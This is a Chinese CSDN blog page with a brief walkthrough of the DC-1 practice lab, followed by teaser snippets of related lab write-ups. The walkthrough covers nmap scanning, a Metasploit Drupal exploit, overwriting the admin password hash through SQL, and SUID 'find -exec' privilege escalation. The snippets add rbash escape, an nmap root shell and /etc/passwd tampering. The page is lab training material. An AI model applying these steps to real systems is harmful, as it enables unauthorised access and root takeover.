靶场DC-1过程解析

最新推荐文章于 2024-09-26 16:26:21 发布
最新推荐文章于 2024-09-26 16:26:21 发布
阅读量282 收藏 3
点赞数 13
文章标签: 服务器 linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shshwjwj/article/details/142511998
版权

1.先输入不ip add 得出自己的ip

2.再输入nmap -sP加上自己的ip/24得出

3.输入searchsploit drupal 7得出

4.输入msfconsole得出

5.然后前面换msf6 输入 use 1   然后输入自己的Ip

然后输入run攻击

6.先输入cd/home 在输入ls 在输入cd flag4/ 在输入ls 输入cat flag4.txt7.

7.在输入/var/www 输入ls 得出flag1txt

8.输入cat flag1.txt

9.输入show databases;得出

10.输入php scripts/password-hash.sh 自己设的新密码

11.将pass字段进行替换update userssetpass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw"where name="admin"要输入两遍  一遍要带空格

12.然后输入touch 123lsfind / -name 123 -exec "whoami"

13.然后返回前面的

14.输入cd /usr/share/john

shshwjwj
关注
vulnhub靶场 DC-2靶机 渗透详细过程
黑战士的博客
02-21 980
*4.rbash提权**
Vulhub 靶场 DC-7解析
黑战士的博客
02-24 1024
kali的靶攻击机IP地址:192.168.200.14DC-7靶机的IP地址:暂时未知注意:靶机和攻击机应处于一个网卡下通过MAC地址判断靶机DC-7的IP 地址。
Vulhub 靶场训练 DC-6解析
黑战士的博客
02-23 1089
提示用kali自带的字典rockyou.txt导出包含k01的密码导出来的字典爆破(没解压的先解压,我之前解压过了)# nmap提权:以root的权限用nmap执行这个脚本,打开root shell的文件,再让nmap执行。第一:利用目录扫描工具寻找该CMS的后台管理系统,然后再爆破密码和账号,进入后台管理系统寻找可利用的点。进入/home/jens目录,打开backups.sh文件,里面是一个压缩命令行,说明该文件可以运行。可以在该文件中添加/bin/bash语句,则可以打开jens的shell了。
Vulhub 靶场训练 DC-9解析
黑战士的博客
02-26 488
3.按照/etc/passwd的格式写一个文件,通过test脚本追加到/etc/passwd中即可提权,运行脚本的时候最好切换到test目录下,test.py的路径为绝对路径。切换到test目录看下,找下这个test.py,在/opt/devstuff目录下,脚本的作用就是将第一个文件的内容附加到另一个文件里面去。/etc/knockd.conf文件,结合搜索到的相关知识,知道用nc分别去尝试这三个端口可以打开SSH端口。运行脚本的时候最好切换到test目录下,test.py的路径为绝对路径。
Vulhub 靶场训练 DC-8解析
黑战士的博客
02-24 1069
kali的IP地址:192.168.200.14DC-8的IP地址:192.168.200.13(一个flag)靶机和攻击机处于同一个网络方式:nat或桥接若出现开机错误,适当将dc的兼容版本改低,我的vmware workstation是17改成16.x就可以兼容。
靶场DC-2
weixin_50340347的博客
06-09 146
利用爬虫爬取网站,根据网站特点生成字典Cewl爬虫生成字典cewl - url 网址(如https : / / www . baidu . com) - w 文件名(如dict . txt)
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-15 2290
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC-1靶场搭建及渗透实战详细过程
baijiaofei的博客
08-24 1720
DC靶场实战过程
靶场DC-2
sunxueer的博客
07-27 1382
DC-2环境:1. 打开虚拟机2. 信息收集2.1 nmap扫描存活主机确定DC-2的ip地址2.2 利用namp扫描DC-2开放的端口2.3 访问一下80端口2.4 尝试寻找该网站的CMS3. 寻找flag3.1 寻找flag13.2 寻找flag23.3 寻找flag33.4 寻找flag4.txt3.4 寻找the final flag总结 环境: 靶机名称:DC-2 攻击机:kali 192.168.78.135 1. 打开虚拟机 导入.ova文件,开启虚拟机 2. 信息收集 2.1 nmap
DC系列漏洞靶场-渗透测试学习复现(DC-7)
W983079520的博客
12-10 1820
DC-7是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权和shell二次反弹。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.149为DC-7靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默
DC-6靶场
qq_49518993的博客
08-31 1227
DC-6靶场
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3673
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
Vulnhub系列之DC2靶场详解
weixin_50053818的博客
05-05 1782
TOC {:toc} 环境 DC-1靶场 VMware虚拟机 kali 直接更改域名解析进网站拿flag1 根据目标靶场的MAC地址得出IP为:192.168.31.182,直接上nmap扫描。 可以发现开放了80端口,网页服务器但是可以看出做了域名解析,所以需要在本地即kali的配置文件/etc/hosts文件写入192.168.31.182 dc-2即可完成本地域名解析。还可以看出网站是由WordPress内容管理系统搭建的。 还开放了7744端口,可以知道使用协议是ssh,所以可以远程连接。 .
DC靶机渗透系列(DC1-DC3)
居上
07-01 763
收获 DC1 回顾了metasploit的一些用法 利用已知cms的exp来getshell hashcat爆破用法 find提权 DC2 cewl根据网页内容生成字典 wpscan结合cewl跑账号和密码 用metasploit的模块来ssh爆破 rbash->bash--------vim逃逸 git提权 DC3 searchsploit的一些用法 在github上搜罗cms探测脚本 john爆破用法 页面模板里添加一句话木马 使用Python开启SimpleHTTPServer 公开的
Linux常用命令
wang_san_sui_的博客
09-23 706
Linux 系统提供了大量的命令来管理系统和处理文件。:创建新文件或更新现有文件的时间戳。:报告文件系统的磁盘空间使用情况。:查看当前正在运行的进程的状态。:从排序好的文件中删除重复行。:显示系统中正在运行的进程。:安全地复制文件到远程机器。:打印当前工作目录的路径。:移动或重命名文件/目录。:更改文件或目录的所有者。:更改文件或目录的权限。:在文件系统中查找文件。:安全地登录到远程机器。:模式扫描和处理语言。:对文件内容进行排序。:查看文件的开始部分。:查看文件的结束部分。:检查磁盘使用情况。
Linux 文件目录结构(详细)
最新发布
2301_80035882的博客
09-26 154
Linux的文件系统是采用级层式的树状目录结构,在此结构中的最上层是根目录“/”,然后在此目录下再创建其他的目录。Linux世界中,一切皆文件!
Linux基础命令——账户简单管理
2301_79096184的博客
09-20 1116
4.会话类型:如果 root 用户通过 su 命令切换到其他用户,原始的 root 会话可能会被隐藏。这里可以通过/etc/shadow文件下看到,stu02用户密码,前面有感叹号,而正常情况下是没有的。1.没有通过终端登录,root 用户可能通过图形界面(如桌面环境)登录。命令:ps aux (显示所有用户的进程信息)命令:ps -p 1 (显示进程 ID 为 1 的进程)命令:ps -u username (显示指定用户的进程)命令:ps ( 显示当前终端的进程)
CentOs-Stream-9 解决此系统未向授权服务器注册问题
纸上得来终觉浅,绝知此事要躬行
09-26 226
无法执行yum安装rpm问题(后面安装Mysql会遇到):This system is not registered with an entitlement server. You can use "rhc" or "subscription-manager" to register.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值